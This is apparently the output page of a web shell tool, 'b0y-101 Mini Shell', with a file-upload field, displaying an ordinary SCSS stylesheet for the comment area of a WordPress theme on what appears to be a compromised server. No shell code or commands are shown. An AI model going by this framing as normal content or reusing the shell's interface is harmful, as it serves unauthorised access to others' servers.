b0y-101 Mini Shell


Current Path : E:/www2/kidsbangna/wp-content/themes/newspaper-x/assets/sass/modules/
File Upload :
Current File : E:/www2/kidsbangna/wp-content/themes/newspaper-x/assets/sass/modules/_comments.scss

.comments-area{
	position: relative;
	top:30px;
	.comments-form{
		background: #f8f8f8;
		padding-top: 15px;
		padding-bottom:15px;
		#reply-title{
		    color:$color_main-accent;
		   	font-weight: 400;
		  	font-family: $font__main;
		  	font-size: 20px;
		  	border-left: none;
		  	text-transform: initial;
		  	margin-bottom: 0px;
		 	span{
			  	background: none;
			  	padding: 0px;
			  	color:$color_main-accent;
			   	font-weight: 400;
			  	font-family: $font__main;
			  	font-size: 20px;
			}
			&:after{
			  	border: none;
			}
		}
		.comment_notes_before{
			display:block;
			color:#8b8d91;
			font-size: 15px;
			font-family:$font__main;
			margin-bottom:30px;
		}
	}
}
.comments-list{
	border: 1px solid #ebebeb;
	margin:36px 0;
	.avatar{
		width:20%;
		float:left;
		padding-top: 40px;
		img{
			border-radius:150px;
		}
	}
	.comment{
		padding: 10px 15px 0px 0px;
		width:80%;
		float:left;
		min-height: 170px;
		p{
			margin-bottom:40px;
			font-size: 14px;
			line-height:20px;
		}
	}
	.social-list{
	    display:none;
		width:5%;
		float:right;
		height: 100%;
		text-align:center;
		ul{
			padding:0px;
			margin-top:25px;
			list-style:none;
			a{
				color:#ebebeb;
				font-size:11px;
				margin-top:20px;

			}
		}
	}
	@media (max-width: 550px) {
		.avatar{
			width:90%;
			border-right: 1px solid #ebebeb;
		}
		.comment{
			width:90%;
			padding-left: 10px;
			h6{
				text-align: center;
			}
		}
		.social-list{
			width:10%;
		}


	}
}

Copyright © 2019 by b0y-101